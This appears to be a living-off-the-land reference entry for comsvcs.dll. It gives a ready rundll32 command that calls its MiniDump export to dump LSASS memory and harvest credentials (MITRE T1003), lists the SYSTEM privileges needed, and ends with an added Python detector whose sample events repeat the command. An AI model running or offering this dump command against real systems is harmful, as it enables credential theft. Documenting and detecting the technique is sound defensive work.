Comsvcs.dll

COM+ Services


Paths:


Resources:
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

Acknowledgement:
modexp - NA


Detection:
MiniDump being used in library



Dump

Calls the MiniDump exported function of comsvcs.dll, which in turn calls MiniDumpWriteDump.
rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Privileges required: SYSTEM
OS: Windows
Mitre: T1003
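
One way to act on the detection note above ("MiniDump being used in library"), as an added example that is not part of the original entry: a Python check over process-creation command lines that flags rundll32 calling the MiniDump export of comsvcs.dll and resolves the target PID to an image name. The event fields (`Host`, `CommandLine`), the PID table and all sample values are constructed assumptions.

```python
import re

# rundll32 loading comsvcs.dll and calling its MiniDump export, followed by
# the "<pid> <output file> full" argument string shown in this entry.
# Matching is case-insensitive so the rule does not depend on path casing.
MINIDUMP_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+.*?comsvcs(?:\.dll)?"?[\s,]+MiniDump\s+"?(?P<args>[^"]*)',
    re.IGNORECASE,
)

def analyze(cmdline, pid_to_image):
    """Return a finding dict for a comsvcs.dll MiniDump command line, else None."""
    m = MINIDUMP_RE.search(cmdline)
    if m is None:
        return None
    parts = m.group("args").split()
    target_pid = int(parts[0]) if parts and parts[0].isdigit() else None
    image = pid_to_image.get(target_pid, "unknown")
    return {
        "target_pid": target_pid,
        "target_image": image,
        "dump_path": parts[1] if len(parts) > 1 else None,
        # A dump of lsass.exe is the credential-access use case in this entry.
        "severity": "high" if image.lower() == "lsass.exe" else "medium",
    }

def scan(events, pid_to_image):
    """Run analyze() over process-creation events and keep the hits."""
    hits = []
    for ev in events:
        finding = analyze(ev["CommandLine"], pid_to_image)
        if finding:
            hits.append({"host": ev["Host"], **finding})
    return hits

# Constructed sample data (not from the page): PIDs, hosts and paths are made up.
PID_TO_IMAGE = {612: "lsass.exe", 4120: "notepad.exe"}
EVENTS = [
    {"Host": "ws01", "CommandLine": r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "612 dump.bin full"'},
    {"Host": "ws02", "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\WINDOWS\System32\comsvcs.dll, MiniDump 4120 C:\Temp\out.dmp full'},
    {"Host": "ws03", "CommandLine": r'rundll32.exe shell32.dll,Control_RunDLL'},
    {"Host": "ws04", "CommandLine": r'findstr MiniDump comsvcs.txt'},
]

if __name__ == "__main__":
    for hit in scan(EVENTS, PID_TO_IMAGE):
        print(hit)
```

The PID-to-image table stands in for whatever process inventory the telemetry source provides at the time of the event.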